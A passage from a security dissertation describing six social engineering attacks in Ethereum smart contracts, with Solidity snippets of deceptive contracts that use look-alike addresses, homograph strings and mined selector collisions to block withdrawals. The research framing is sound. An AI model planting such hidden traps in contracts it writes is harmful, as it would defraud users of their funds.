it difficult to accommodate the ever-growing high transaction demand. Previous research endeav-
ors to improve the scalability and performance of blockchain through various technologies, such
as side-chaining, sharding, secured off-chain computation, communication network optimizations,
and efficient consensus protocols. However, these approaches have not attained a widespread adop-
tion due to their inability in delivering a cloud-like performance, in terms of the scalability in trans-
action throughput, storage, and compute capacity. In this dissertation, we address the scalability
challenge of decentralized computation by using the Ethereum blockchain to secure execution of
off-chain smart contracts on the cloud thereby eliminating the data, computation and transaction
throughput limitations.
     Another important application of the blockchain technology proposed in this dissertation is
orchestration of decentralized WiFi hotspots. WiFi hotspots often suffer from mediocre security,
unreliable performance, limited access, and cumbersome authentication procedure. Specifically,
public WiFi hotspots can rarely guarantee satisfactory speed and uptime, and their configuration
often requires a complicated setup with subscription to a payment aggregator. Moreover, paid
hotspots can neither protect clients against low quality or non-service after prepayment, nor do
they provide an adequate defense against misuse by the clients. In this dissertation, we introduce a
blockchain-assisted network of WiFi hotspots, which is not only decentralized but also maintains
scalability and high performance.
                                                    13


1.3: Organization
The rest of this document is organized as follows. Part I presents the work in which we reveal
overlooked attacks against blockchain and smart contracts. Chapter 2 introduces six zero-day social
engineering attacks in Ethereum smart contracts. Chapter 3 elaborates on our new attack against
hardware crypto wallets. Part II elaborates on the defense against security threats in smart contracts.
Chapter 4 surveys existing state-of-the-art threat mitigation solutions for smart contracts. Chapter
5 introduces the new paradigm of context-aware user-based transaction testing. Part III presents
novel applications and efficiency enhancements of blockchain. Chapter 6 addresses the blockchain
scalability problem by enabling smart contracts on the cloud. Chapter 7 introduces a blockchain-
based solution for decentralized network of WiFi hotspots with cross-domain authentication and
QoS enforcement. Chapter 9 summarizes this dissertation and outlines future directions.
                                                 14


CHAPTER 2: SOCIAL ENGINEERING IN
ETHEREUM SMART CONTRACTS1
2.1: Introduction
In one decade, the blockchain technology has emerged from a ledger of barely known cryptocur-
rency to an entire industry with hundreds of billions of dollars in market capitalization. A major
reason of its vast expansion is the ability to support smart contracts — decentralized programs that
can enforce execution of protocols without any third party or mutual trust. Moreover, smart con-
tracts are used to store and transfer financial assets. For example, as of December 2020, the Tether
USD smart contract had more than 2.1 million users with about $36 billion in daily transaction
volume [28].
      Like any other software, smart contracts have security vulnerabilities, manifested by recent
hacks with multimillion-dollar damages [207, 226]. Moreover, a recent analysis of 420 million
Ethereum transactions by Zhou et al. reveals an ongoing evolution of vulnerabilities and attacks
in smart contracts [309]. To avoid devastating consequences of smart contract hacks, a number of
security auditing tools have been developed to detect smart contract vulnerabilities [76,96,200,271],
such as reentrancy, integer overflow, etc., most of which are smart contract code vulnerabilities.
However, smart contracts are designed and implemented by human developers to interact with
human users, in which the human is the central component of a smart contract ecosystem. Yet, the
existing smart contract security studies do not take the human factor into account. In this work, we
aim to deliver the first human-centered study of smart contract security.
      Instead of targeting known code vulnerabilities, social engineering attacks exploit cognitive
    1
      This chapter is based on previously published work by Nikolay Ivanov, Jianzhi Lou, Ting Chen, Jin Li and
Qiben Yan titled “Targeting the Weakest Link: Social Engineering Attacks in Ethereum Smart Contracts” pub-
lished at the Proceedings of the 2021 ACM Asia Conference on Computer and Communications Security. DOI:
10.1145/3433210 [158].
                                                       15


bias of human mind. Cognitive bias is an optimization function of the human brain that draws
conclusions based on probability, expectation, previous experience, belief, or emotional response,
especially when the input data is incomplete and/or decision time is limited [145]. One common
technique exploiting cognitive bias is visual deception, which has been widely used in email phish-
ing, e.g., via mimicking the appearance of a popular website [285] or International Domain Name
(IDN) homograph attacks [150]. Another aspect of cognitive bias is confirmation bias, character-
ized by the rejection of evidence dissenting from the initially established belief or narrative [169].
Smart contract honeypot is one example of confirmation bias exploitation, in which the established
narrative that the smart contract is vulnerable makes even experienced hackers overlook hidden
traps.
    Honeypot is the only known and documented social engineering attack type in Ethereum [270].
A honeypot is a smart contract that lures a hacker into exploiting a known vulnerability, but an
insidious trap in this contract turns the hacker into a victim instead. Despite being a very effective
attack class, the scope of potential victims of honeypots is narrow, i.e., skillful hackers who try to
steal unprotected funds.
    In this work, we demonstrate that the Ethereum platform and the most popular smart contract
programming language, Solidity, create a potential for evasive social engineering attacks. Social
engineering attacks have been carried out across a wide spectrum of technologies, from landline
phones to corporate networks. When existing software and hardware defense reduces the attack
surface, the adversaries resort to exploiting human cognitive bias — the weakest link in many
security systems. To the best of our knowledge, this work presents the first investigation of the
possibility, vectors, and impact of social engineering attacks in smart contracts, as well as defense
against these attacks. Specifically, we attempt to answer the following three research questions.
RQ1: What are the Ethereum social engineering attack vectors? We analyze the exact aspects
of human cognitive bias that can be exploited to carry out social engineering attacks in smart con-
tracts. Specifically, we discover several common misconceptions and undocumented behaviors of
the Ethereum platform that create opportunities for a set of zero-day social engineering attacks.
                                                   16


RQ2: Are social engineering attacks in smart contracts feasible? Through our analysis, we
identify two classes of social engineering deception — Address Manipulation and Homograph.
Across these two categories, we develop six social engineering attacks. By integrating the patterns
of these attacks in the source codes of existing contracts with large number of users and billions of
dollars in market capitalization, we further show that these attacks could potentially target a large
number of victims.
RQ3: What are the defenses against social engineering attacks in Ethereum? The human is
not only the main target of social engineering attacks, but also an irreplaceable element of defense
against these attacks. This prompts us to develop specific security recommendations for identifica-
tion and prevention of social engineering attacks by users and auditors.
     In summary, this dissertation delivers the following contributions:
     • We identify two classes of social engineering attacks in Ethereum smart contracts, Address
        Manipulation and Homograph, and develop six zero-day attacks.
     • We demonstrate the attacks by embedding them in source codes of five popular smart con-
        tracts with combined market capitalization of over $29 billion, and show that the attacks have
        the ability to remain dormant during the testing phase and activate only after production de-
        ployment.
     • We analyze 85,656 open source smart contracts and find 1,027 contracts that can be directly
        used for performing social engineering attacks.
     • For responsible disclosure, we contact seven smart contract security firms. The survey of
        experts from these firms confirms that the proposed attacks are highly likely to be dangerous.
     • In the spirit of open research, we make the source codes of the attack benchmark, tools, and
        datasets available to the public2 .
   2
     https://nick-ivanov.github.io/se-info/
                                                  17


2.2: Background
Smart Contracts and EVM: A smart contract is a program deployed on a blockchain that provides
a set of functions to be called via transactions and executed by the blockchain’s virtual machine
(VM). Most smart contracts are written in a high-level special-purpose programming language,
such as Solidity or Vyper, and compiled into the blockchain VM bytecode. The Ethereum Virtual
Machine (EVM) is the blockchain VM for executing Ethereum smart contracts.
Externally Owned Account: Ethereum blockchain has two types of accounts: smart contract
account and externally owned account (EOA). Both EOAs and smart contract accounts can be
referenced by their 160-bit public addresses. EOAs can be used to call the functions of smart
contracts via signed transactions.
ERC-20 Tokens: ERC-20 is the most popular standard for implementing fungible tokens3 in
Ethereum smart contracts. Some of the most traded alternative cryptocurrencies (altcoins) are
ERC-20-compatible smart contracts deployed on Ethereum Mainnet, such as ChainLink and Bi-
nance Coin. The ERC-20 standard defines an interface that a smart contract should implement in
order to become an ERC-20 token to interact with ERC-20-compliant clients4 .
OpenZeppelin Contracts: OpenZeppelin Contracts is a library of smart contracts that have been
extensively tested for adherence to the best security practices. These smart contracts are consid-
ered to be the de-facto standardized implementations of popular smart contract code patterns. The
OpenZeppelin project provides a rich codebase for ERC-20 token developers5 .
EIP-55 Checksums: Developers of blockchain clients use checksums for validating public ad-
dresses. A checksum is a digital fingerprint of an address to ensure its validity and correctness.
In Ethereum, the checksum is embedded in the address by capitalizing certain hexadecimal letters,
as described in the EIP-55 standard6 . Specifically, if the ith hexadecimal digit of Keccak256 hash
   3
     Each fungible token has the same value and does not possess any special characteristics compared with other
tokens of the same type.
   4
     https://eips.ethereum.org/EIPS/eip-20
   5
     https://openzeppelin.com/contracts/
   6
     https://eips.ethereum.org/EIPS/eip-55
                                                      18


digest of the EIP-55 address string is ≥ 8, the ith hexadecimal digit of the address is capitalized.
The accuracy of EIP-55 error checking is nearly 99.986% [55].
Smart Contract Addresses: A smart contract address in Ethereum is generated using the deter-
ministic function7 χ(Ad , η), where Ad is the public address of the account deploying the contract,
and η is the nonce of the deploying transaction. η is always equal to the number of transactions
sent from the deploying EOA. As a result, we can deterministically calculate the address of a future
smart contract that will be deployed by a certain user.
EVM Function Selector: In EVM, when a smart contract function is called by an EOA or another
smart contract, the calling function is identified by its selector Sf as follows:
                                                     function header string
                                                         z        }|      {
                                    Sf = P32 (Hk ( “f (α1 , ..., αn )” )),
where P32 is a 32-bit prefix, Hk is the Keccak256 hash function, f is the function name, and
α1 , ..., αn is the list of argument types (0 ≤ n ≤ 16). For example, the selector of the function f oo
with a single 256-bit unsigned integer argument is P32 (Hk (‘‘f oo(uint256)”)) = 0x2fbebd38.
2.3: Threat Model
In this section, we give a general overview of social engineering attacks in Ethereum smart contracts
by identifying their participants, vectors, goals, and outcomes.
2.3.1: Actors
Most known attacks in Ethereum smart contracts involve a hacker exploiting a smart contract vul-
nerability [55, 309]. In social engineering attacks, however, a reverse configuration takes place:
the owner of the malicious smart contract is the attacker, and the victim of the smart contract is a
person or organization who engages with this smart contract.
    7
      An implementation of this function can be found at https://github.com/ethereumjs/ethereumjs-util.
                                                          19


2.3.2: Social Engineering Attack Vectors
Here, we expose a number of social engineering attack vectors that are likely to be exploited. Es-
sentially, all these vectors are misconceptions (false assumptions) about properties or behaviors
of the Ethereum platform. We subdivide these misconceptions into two major categories: 1) mis-
conceptions about Ethereum addresses, and 2) misconceptions related to strings and characters in
EVM and Solidity.
Misconceptions About Addresses: An Ethereum public address is a 160-bit number using a 40-
digit hexadecimal representation. Our analysis reveals that the following four false assumptions
about Ethereum public addresses can be exploited in social engineering attacks.
     • M1 : Slight modification of an address (e.g., substitution of a single digit) is useless for an
       attacker because no one knows the private key associated with the modified address. In
       this dissertation, we demonstrate that the knowledge of the private key for an address is not
       always required for a successful social engineering attack.
     • M2 : EIP-55 checksums deliver a reliable protection against address falsification. In this
       work, we show that EIP-55 falsification is possible using a brute-force attack on a retail
       laptop or desktop computer.
     • M3 : An Ethereum address is associated either with an EOA, or a smart contract, and does
       not change its status. In this dissertation, we demonstrate that an EOA can mutate into a
       smart contract and vice versa.
     • M4 : All Ethereum accounts are equally secure as long as their private keys are random and
       secret. In this dissertation, we show that a small portion of Ethereum accounts have a special
       property, making them more vulnerable to a specific social engineering attack.
Homograph Backdoors in Solidity: Falsification of typographic symbols, known as homograph
or Unicode attacks, have been used in phishing scams [124,150,192]. These attacks mostly falsify
domain names, and to the best of our knowledge, there are no recorded homograph attacks carried
inside a source code of a program. Surprisingly, our analysis of Solidity reveals the following three
misconceptions that open dangerous backdoors to homograph attacks in Ethereum smart contracts.
                                                   20


      • M5 : Since the string returned by the ERC-20 symbol() function is optional and informa-
        tional by design, it does not pose any danger. In this dissertation, we show that by falsifying
        the symbol of an ERC-20 token, an attacker can perform a social engineering attack.
      • M6 : Two identical arguments of call() or delegatecall() always result in the same 32-bit
        function selector. In this dissertation, we demonstrate that two identical arguments are capa-
        ble of producing different function selectors, which leads to the execution of an unexpected
        function or transaction reversion due to the absence of a referenced function.
      • M7 : Function selector collision prevention by Solidity compiler eliminates falsification of
        smart contract functions. In smart contracts, two functions with colliding selectors cannot
        coexist in one contract. In this dissertation, we show that it is possible to mine names of
        two functions with visually identical arguments of call() or delegatecall() routines that
        generate different selectors, thereby allowing these two functions to coexist in the contract.
        Consequently, unbeknownst to the transaction sender, a non-existent function might be called,
        resulting in transaction reversal; or a wrong function might be called, leading to unexpected
        code execution.
2.3.3: Attack Goals and Outcomes
Although some Ethereum attackers may pursue vandalism as the primary goal (e.g., via ”funds
freeze”), in this work, we assume that the ultimate objective of the attacker is to steal funds from
victims. All social engineering attacks covered in this study are based on the premise that the
attacker is the owner or privileged user of the smart contract8 , which creates a broad range of pos-
sibilities for stealing funds. For example, many contracts implement the selfdestruct procedure,
which allows the owner to appropriate the entire balance of the contract by submitting a single
transaction.
     Moreover, as of early December 2020, Etherscan reports more than 342,000 ERC-20 smart
contracts, which have a variety of operations with tokenized funds, such as minting, burning, ap-
   8
     In Ethereum, the implementation of smart contract ownership is the developer’s responsibility. Zhou et al. [309]
report more than 2 million contracts with ownership implemented using the OpenZeppelin Ownable abstract class and
onlyOwner modifier.
                                                        21


                  Table 2.1: Social engineering attacks in Ethereum smart contracts.
                                       Social Engineering Attack                    Miscon-
       Attack Class
                                          and Brief Description                     ceptions
                        A1 : Replace EOA with a non-payable contract address
                                                                                    M1 , M2
                         to incur transfer failure and revert transaction
         Address        A2 : Pre-calculate a future contract address and replace
       Manipulation                                                                   M3
                        EOA with a non-payable contract at this address
                        A3 : Exploit EVM’s EIP-55 checksum insensitivity
                                                                                      M4
                        in address comparison
                        A4 : Use dynamically-injected homograph
                                                                                      M5
                        string in a branching condition
                        A5 : Replace inter-contract call (ICC) header with
        Homograph                                                                   M6 , M7
                        identically looking one to call a non-existing function
                        A6 : Suppress EVM exception by mining a
                                                                                    M6 , M7
                        function that matches a tampered ICC header
proved transfer, etc. For example, in Tether USD stablecoin token, which is worth over $19 billion,
the owner can call the deprecate function of the contract, effectively replacing the functionality
of the smart contract into any arbitrary code. Subsequently, it would take only a few minutes for
the contract owner to steal all the tokens and exchange them into Ether, at which point no exist-
ing defense can revert the theft of funds. Essentially, when the attacker is the owner of the smart
contract, it is unnecessary to implement the malicious transfer of funds within the call stack of the
transaction submitted by the victim. Instead, the attacker may prefer to accrue a sufficient sum by
blocking fund withdrawals, and acquire the entire balance afterwards. Such an approach makes the
malicious patterns more stealthy than an immediate transfer of stolen funds.
2.4: Social Engineering Attacks
In this section, we introduce six Ethereum social engineering attacks grouped into two classes,
as shown in Table 2.1. The Address Manipulation class allows attackers to strategically exploit
Ethereum public addresses, which empowers attacks A1 , A2 , and A3 . The Homograph class, which
takes advantage of the fact that many fonts have identically looking symbols with different codes,
includes attacks A4 , A5 , and A6 . The implementations of all the six attacks are available at https:
//nick-ivanov.github.io/se-info/.
                                                   22


 1 contract BaseToken is Context , ERC20 , ERC20Detailed {
 2    uint256 tokenPrice = 100 wei;
 3    constructor () public payable ERC20Detailed (                     " BaseToken ", "BT", 18) {
 4       _mint ( _msgSender () , SafeMath .div(msg.value , tokenPrice ));
 5    }
 6    function buyTokens () public payable {
 7       _mint ( _msgSender () , SafeMath .div(msg.value , tokenPrice ));
 8    }
 9    function sellTokens ( uint256 amount ) public {
10       _burn ( _msgSender () , amount );
11       address (msg. sender ). transfer ( SafeMath .mul(amount , tokenPrice ));
12    }
13 }
Figure 2.1: Implementation of the Base Token, which is used to demonstrate the six social engi-
neering attacks.
Base Token: We demonstrate all the six attacks by altering the implementation of the smart contract
called Base Token (see Fig. 2.1). This contract is an Ether-collateralized ERC-20 token, which
means that the supply of tokens in the contract is backed by its Ether balance, allowing users to
swap (i.e., buy and sell) the tokens using Ether. We implement Base Token using the OpenZeppelin
ERC-20 prototype with two additional methods:
     • buyToken method deposits Ether in the smart contract and mints (issues) tokens correspond-
       ing to the deposited amount;
     • sellToken method burns (destroys) user tokens and transfers the corresponding amount of
       Ether to the caller.
2.4.1: Address Manipulation
Address Manipulation attacks exploit cognitive biases and misconceptions about equality, format,
referenced objects, derivation methods, and other properties of Ethereum public addresses. In this
section, we propose three social engineering attacks: A1 , A2 , and A3 .
Attack A1 : This attack covertly substitutes an EOA address into a similar smart contract address
that allows the attacker to block funds withdrawal and subsequently acquire them. In A1 attack,
the attacker deploys a smart contract with two sequential Ether transfers within the call stack of one
transaction. The first transfer looks like a fee collection, while the second transfer is a fund transfer
                                                    23


                                  Figure 2.2: Attack A1 workflow.
to the user. The attacker deceives a victim to believe that the first transfer goes to an EOA, whereas
the real destination is a smart contract without a payable fallback function. Therefore, the transfer
fails, and the funds (deposited by the users earlier) remain in the malicious contract, which are
available for the attacker for subsequent withdrawal through contract self-destruction, deprecation,
or similar mechanism.
    Essentially, the attacker exploits the fact that almost any unused sequence of 40 hexadecimal
digits is a valid EOA address, even if its corresponding private key is unknown. Particularly, if
a few symbols in an address are replaced or swapped, the resulting address will still be a valid
Ethereum EOA, which can accept incoming Ether transfers. In A1 attack, as shown in Fig. 2.2,
the adversary deploys a malicious smart contract CA . The variable feeAddress in this contract
                                                  24


is initiated with an EOA address A1 . Also, each fund transfer to the user is preceded by another
transfer of a small fee to the address stored in feeAddress. This creates a perfect illusion that the
smart contract was deployed to profit from service fees. However, the real purpose of the contract
is to lure the user to make a deposit and block any attempt to withdraw the funds.
      To achieve that, we introduce another public address A2 , derived from address A1 by either
changing one symbol or swapping neighboring symbols to make two addresses visually similar.
The manipulated address must maintain a valid checksum that collides with the checksum of the
original address, reassuring the user that the address is the one seen in the constructor. We find
that mining such an address pair takes only a few seconds9 , and thus demonstrate the incorrectness
of M2 . Address A2 belongs to a pre-existing smart contract Caux , which does not have a payable
fallback function. The attacker sets the value of feeAddress into A2 . Due to the addresses’ visual
similarity, the user deposits funds with the assumption that the fees go to A1 . However, the with-
drawal fails due to an attempt to send fees to an unpayable smart contract. For further deception,
the attacker can generate a history of successful fee transfers from the smart contract to address
A1 , deceiving the users into believing that the smart contract is actively receiving successful fee
payments. This deepens the users’ confirmation bias that complies with the attacker’s deceptive
narrative.
      The attack workflow in Fig. 2.2 includes four layers of deception that give the victim several
clues aligned with the same narrative (i.e., the contract is a fair for-profit scheme), thereby exploit-
ing the victim’s confirmation bias. The first layer of deception is that the smart contract does not
reveal its deceptive nature during a test deployment — if a user compiles and deploys this smart
contract for testing, the scheme will support the deceptive narrative because the test deployment can-
not predict that the owner would change the value of feeAddress into the address of a non-payable
smart contract. The second layer of deception comes from the deployment-time initialization of
the feeAddress variable: by examining this address, the victim finds a history of fair transactions.
The third layer of deception is delivered through keeping the feeAddress variable private, which
    9
      Our address miner is available at https://github.com/nick-ivanov/se-tools
                                                           25


prevents the victim from easy retrieval of its current value, as it requires a laborious effort of pars-
ing binary transaction data. The fourth layer of deception targets a user who manages to retrieve
the current value of feeAddress. Since this value is visually similar to the initialization address,
the victim is likely to conclude that the original address is in use.
Attack A2 : This attack intercepts a client deposit event and immediately deploys an auxiliary
malicious smart contract at an EOA address for stealing funds accrued via blocked withdrawals.
The key idea is to mislead the user by runtime replacement of what an address points to. The
attack utilizes a more sophisticated method that dynamically changes the object referenced by an
address. Here, we discover a peculiar combination of two facts about Ethereum that lead to the
incorrectness of M3 : a) the address of a future, not yet deployed, smart contract is predictable;
b) prior to deployment, the address of the future smart contract has the status of a legitimate EOA.
Recall from Section 2.2 that a smart contract address is generated from the address of the deploying
EOA and the transaction tally in this EOA.
    Fig. 2.3 illustrates the workflow of attack A2 . Smart contract A is disguised as a fair for-profit
scheme, in which the owner charges fees per fund withdrawal. The fee recipient address is hard-
coded in the smart contract and set as a constant, which fuels the confirmation bias supporting the
notion of permanence of this address. For normal operation, this address should accept incoming
funds, which means that it should either be an EOA or a smart contract with a payable fallback
function. When the user makes a deposit, an event is emitted, which is intercepted by a server
belonging to the attacker (the owner of smart contract A). Upon the detection of the event, the
attacker deploys smart contract B at the address Af . The fee collector address Af is crafted in
a way that the attacker knows the corresponding private key of the account Ad , based on which
the contract B is deployed, i.e., Af = χ(Ad , η) (see Section 2.2). The fee transfer to address Af
now fails because smart contract B has no payable fallback function. As a result, the previously
deposited funds remain in the contract for subsequent acquisition by the attacker.
Attack A3 : The attack leverages the overlap between lower-case and mixed-case EIP-55 addresses
to misguide users into locking their funds in the smart contract for subsequent acquisition thereof
                                                   26


                                    Figure 2.3: Attack A2 workflow.
by the attacker. In attack A3 , the attacker provides the user with a personal smart contract and
a seemingly random test Ethereum accounts. When a smart contract has hard-coded addresses
or other account-specific values, it is a common practice to provide users with test accounts to
demonstrate the functionality of a smart contract [55]. Since all accounts are assumed to have the
same set of properties, the user believes that any account will have the same behavior as the test
accounts, which we found not to be always true. Essentially, attack A3 exploits M4 , i.e., the belief
that the secrecy of the private key solely determines the security of an Ethereum account. The key
to this attack is the generation of accounts with all lowercase EIP-55 checksums. We verify that
the probability of generating an EIP-55 address with lowercase checksums is about 0.0246% using
a random guessing approach.
      One-time-password validation is a common supplemental authorization technique in smart con-
tracts10 . The smart contract owner can generate an authentication hash of the user address and the
corresponding user password, and store this hash in the smart contract. In this attack, the adversary
creates such a password validation routine in the smart contract, and offers the user several test
accounts for verification of functionality. However, the test set consists of only deliberately mined
accounts with all lowercase EIP-55 checksums. In this smart contract, the fund transfer function
is preceded by a password validation, which invokes an address conversion function that translates
the address of the transaction sender into an all-lowercase string (e.g., strAddrHash in Fig. 2.4).
   10
      Sample password-based authorization can be found in these contracts: 0x0f82C7EAb8F7efB577A2DE9d2B7
e1Da1d0b6870e, and 0x13407d93F343148bf03eaCf482441dD526cD7EbD.
                                                     27


 1 bytes32 constant authHash =
 2 0 x8e69860da968defb8d06a7e565e5d76e3e878a01473a0cb191a0eda120323ca5
 3 function strAddrHash ( address _addr ,
 4 string memory _pass ) private pure returns ( bytes32 ) {
 5    return keccak256 (abi. encodePacked ( addr2Str ( _addr ), _pass ));
 6 }
 7 function sellTokens ( uint256 amount , string memory password ) public {
 8    if( strAddrHash (msg.sender , password ) == authHash ) {
 9        _burn ( _msgSender () , amount );
10        address (msg. sender ). transfer ( SafeMath .mul(amount , tokenPrice ));
11    }
12 }
                   Figure 2.4: Code snippet from function sellTokens in A3 attack.
Using the test accounts, the smart contract works as expected. After the testing, the user creates
a production authentication hash by concatenating his/her public address (copied from the wallet)
and a secret password. This production account cannot be tested to avoid revealing the password
through the open network of the public blockchain. Unexpectedly, an attempt to withdraw the funds
will fail due to a failure in password validation caused by the disparity in the address capitalization.
    Fig. 2.4 demonstrates an example of attack A3 . The authHash constant variable stores the Kec-
cak256 digest of the user address 0xe6c700856796524501438d7197497c14bceac297 concatenated
with the password ASIACCS2021. The attacker offers the user the private keys of several test ac-
counts, whose public addresses’ EIP-55 checksums are all lowercase. These test accounts work
as expected. But when the users initiate transactions with their real addresses, the password vali-
dation fails, since authHash incorporates the address with checksums in mixed-case letters, while
strAddrHash generates the hash using the same address with all lowercase checksums. This failed
validation prevents the selling of tokens by the user. This attack demonstrates that some accounts
can be more vulnerable than others, effectively defying misconception M4 .
2.4.2: Homograph Visual Cognitive Deception
The homograph attacks in smart contracts are enabled by the existence of symbols that look identical
or very similar, whereas most text editors (except hex viewers) are unable to reveal the difference.
We surveyed security experts from seven smart contract auditing firms (listed in Section 2.6.5)
                                                   28


 1 if( stringsEqual ( symbol () , "BT")) {
 2      _burn ( _msgSender () , amount );
 3      address (msg. sender ). transfer ( SafeMath .mul(amount , tokenPrice ));
 4 }
                       Figure 2.5: A snippet of the sellTokens function in A4 attack.
about the usage frequency of hex viewers in their auditing process. The survey results show that
only 1 out of 7 companies uses hex viewers usually, 2 of them use hex viewers sometimes, while
the rest never or rarely use them. Here, we define two words or letters that contain identically
looking symbols with different codes as a pair of homograph twins. The Homograph class of social
engineering attacks leverages the fact that: although Solidity prohibits Unicode symbols in the
names of functions and variables, it allows these symbols to appear in string literals that determine
branching and inter-contract calls. In this section, we introduce three Homograph attacks: A4 , A5 ,
and A6 .
Attack A4 : The attack leverages homograph twins in a string matching pattern to craft a malicious
smart contract. Specifically, the attacker crafts a smart contract in which a homograph string is used
in a branching condition, which leads to unexpected code execution.
      Fig. 2.5 demonstrates attack A4 , with the attack code embedded in the sellTokens() function.
The stringsEqual() function performs a string matching by comparing the hashes of two strings11 .
The literal BT is made of two ASCII characters, but the symbol() return value, although visually
identical to literal BT, has the symbol T substituted with its homograph twin from the Cyrillic symbol
set. Since the value of symbol() is mutable, the smart contract does not contain any explicitly
malicious code, however, it turns malicious when the token symbol value is changed. As a result,
the branching condition turns false, and the sell of tokens never occurs, which proves the importance
of the token symbol, and thus refuting misconception M5 .
Attack A5 : This attack replaces the header of a function with its homograph twin to cause unex-
pected inter-contract call failures. Code reuse has been one of the best practices of smart contract
   11
      Solidity does not have any embedded or library string matching function. As Keccak256 digest is an EVM opcode
function with relatively low gas cost, comparing string hashes is de-facto the standard string comparison approach.
                                                           29


                                        Figure 2.6: Attack A5 workflow.
development, allowing to reduce implementation time and frequency of programming errors. Code
reuse can be either static or dynamic. A typical example of static code reuse is inheriting classes
from the OpenZeppelin Contracts library. EVM also supports dynamic code reuse, in which one
smart contract calls functions of another contract deployed on the same blockchain. Dynamic code
reuse reduces the utilization of blockchain storage and achieves native inter-contract communi-
cation (ICC). It is known that if a function is specified incorrectly in an ICC call, the fallback
function12 of the smart contract will be invoked instead [57]. However, if the fallback function is
absent, the call to a non-existent function triggers an EVM exception with subsequent transaction
reversal, which is utilized by attack A5 via falsification of a function ICC selector.
      Fig. 2.6 demonstrates the general idea of attack A5 . During an ICC call, when an expected
function in the destination smart contract is not found, and with no fallback routine implemented,
the call will unexpectedly fail, and the transfer of funds to the client will not be executed. The
proposed A5 attack substitutes one or several letters in the function header string with homograph
twins, and as a result, the generated function selector will not match any existing function, leading
to the ICC call failure.
      Fig. 2.7 shows the sellTokens function of A5 attack. We create and deploy an additional smart
contract called Helper (see Fig. 2.8), whose address is hard-coded in the BaseToken contract. The
Helper smart contract has a log function for event logging. However, the string “log(address)”
   12
      In Ethereum smart contracts, the fallback function is an optional nameless function designed to be a default inter-
face of a smart contract.
                                                           30


  1  bytes memory payload = abi. encodeWithSignature
  2  ("log( address )", msg. sender );
  3  bool success = address ( helperAddress ).call( payload );
  4  if( success ) {
  5     _burn ( _msgSender () , amount );
  6     address (msg. sender ). transfer ( SafeMath .mul(amount , tokenPrice ));
  7  }
                          Figure 2.7: Code snippet from function sellTokens in A5 .
  1 mapping ( address => uint256 ) private lastSell ;
  2 function log( address a) public {
  3     require (msg. sender ==
  4        0 x0EFb5DE6AddAdDE835CEaadaAB1992590d7588F5 );
  5     lastSell [a] = block . number ;
  6 }
                         Figure 2.8: A code snippet of the Helper contract used in A5 .
contains letters substituted with their homograph twins, and therefore the ICC call fails. Thus,
the subsequent fund transfer to the caller never happens. This example demonstrates that visually
identical arguments of call() and delegatecall() routines can indeed produce different selectors,
proving the incorrectness of M6 .
Attack A6 : The previous attack has one major weakness: although nothing in the code looks sus-
picious, the status check of the ICC call may prompt a cautious user to set up a test deployment to
check whether the call succeeds or not. Our next attack provides a deceptive technique to pass such
a test. Attack A6 leverages potential collision cases of Ethereum function selectors, whose length
is only 32 bits, to ensure a successful status from a deceptive ICC call. Assuming a uniform distri-
bution of function selectors, the probability of collision with another function (i.e., two functions
have the same selector) is approximately 2.33 · 10−10 . We run an experiment to show that it only
takes a few hours on average for an office computer to find a collision13 . In attack A6 , the attacker
crafts a function whose selector collides with the selector of the homograph twin of the expected
function. Since the called function actually exists, the transaction succeeds, which further fuels the
confirmation bias of the victim supporting the deceptive narrative crafted by the attacker.
    13
       Generally, the larger the number of symbols available for homograph substitution in the function header, the less
time it takes to mine a collision.
                                                           31


                               Figure 2.9: Workflow in the A6 attack.
    The Solidity compiler will terminate with an error if it encounters two functions with the same
selectors in one smart contract. A6 attack avoids this issue by replacing a function header with
its homograph twin. In the workflow of the attack, presented in Fig. 2.9, smart contract A im-
plements a call to a function in smart contract B. When B is compiled, the string header of the
function foo will be translated into the 32-bit selector 0xc2985578. However, if we substitute both
the letters “o” in the string “foo()” with their homograph twins, the compiler will translate the
modified header into the selector 0x3293f 02a. Now, the attacker uses a collision search algorithm
to mine the function name bar821770037, whose selector is also 0x3293f 02a. As a result, foo
and bar821770037 can coexist in contract B, despite the fact that they both have visually identical
argument of delegatecall, i.e., "foo()" (see step · in Fig. 2.9), effectively refuting M7 . After
the homograph substitution, unbeknownst to the user, bar821770037 will be called instead of foo,
which will return a successful status but break the anticipated code logic in contract A.
    Figs. 2.10 and 2.11 demonstrate an example of the A6 attack. The Helper smart contract in-
cludes two functions, accountRegistered and afterBlock29410106. Since block number checks
                                                  32


 1 bytes memory payload = abi. encodeWithSignature
 2      (" accountRegistered ( address )",msg. sender );
 3 (bool success , bytes memory result ) = address ( helperAddress ). delegatecall (
          payload );
 4 require ( success );
 5 if(abi. decode (result , (bool)) == true) {
 6      _burn ( _msgSender () , amount );
 7      address (msg. sender ). transfer ( SafeMath .mul(amount , tokenPrice ));
 8 }
                        Figure 2.10: Code snippet from function sellTokens in A6 .
 1  function afterBlock29410106 (bool deadlineCheck )
 2      public view returns (bool) {
 3      if( block . number > 29410106 && deadlineCheck ) {
 4         return true;
 5      }
 6      return false ;
 7  }
 8  function accountRegistered ( address a) public pure returns (bool) {
 9      return a== mainAccount || a== backupAccount ;
10  }
                     Figure 2.11: A snippet of the Helper contract used in A6 attack.
are common in Ethereum smart contracts14 , the presence of an auxiliary function with this name
is unlikely to raise any suspicion. The string “accountRegistered(address)” (Fig. 2.10) con-
tains Cyrillic letters (letters 1, 2, 3, and 16 are replaced). We use a brute-force algorithm to
mine the name afterBlock29410106, whose function selector collides with a homograph twin of
``accountRegistered(address)''. Surprisingly, we discover that the functions afterBlock2941
0106 and accountRegistered can accept arguments of different types: the call will still succeed
regardless of the argument types, as long as the number of arguments in the two functions is consis-
tent. This undocumented behavior of EVM adds an additional layer of disguise to the attack. In the
end, afterBlock29410106 is called instead of the expected function accountRegistered. Unlike
in A5 attack, the success variable is now true. However, the user’s fund transfer does not happen
despite the successful return status, as the function’s return value is not as expected.
   14
      For example, contract 0xb68c88283b558cdc38c75c07bbc0d6921ef40fc7 uses a block number check to deter-
mine the contract initialization deadline.
                                                    33


 Table 2.2: Five popular tokens that we succeed in integrating social engineering attack patterns.
                         Smart           Market Capitalization†          Integrated
                       Contract                 (×$1 billion)         Attack Pattern
                 Tether USD (USDT)                  19.76                    A4
                    Binance (BNB)                     4.6                    A5
                   ChainLink (LINK)                  3.94                    A1
                    Bitfinex (LEO)                   1.32                    A6
                  CryptoKitties (CK)                  —                    A1 + A2
                 †
                   Approximate rounded averages as of early December 2020.
2.5: Case Study of Real-world Smart Contracts
One of the most important questions of this work is whether the six social engineering attacks can be
used in real-world smart contracts. To answer this question, we choose source codes of five smart
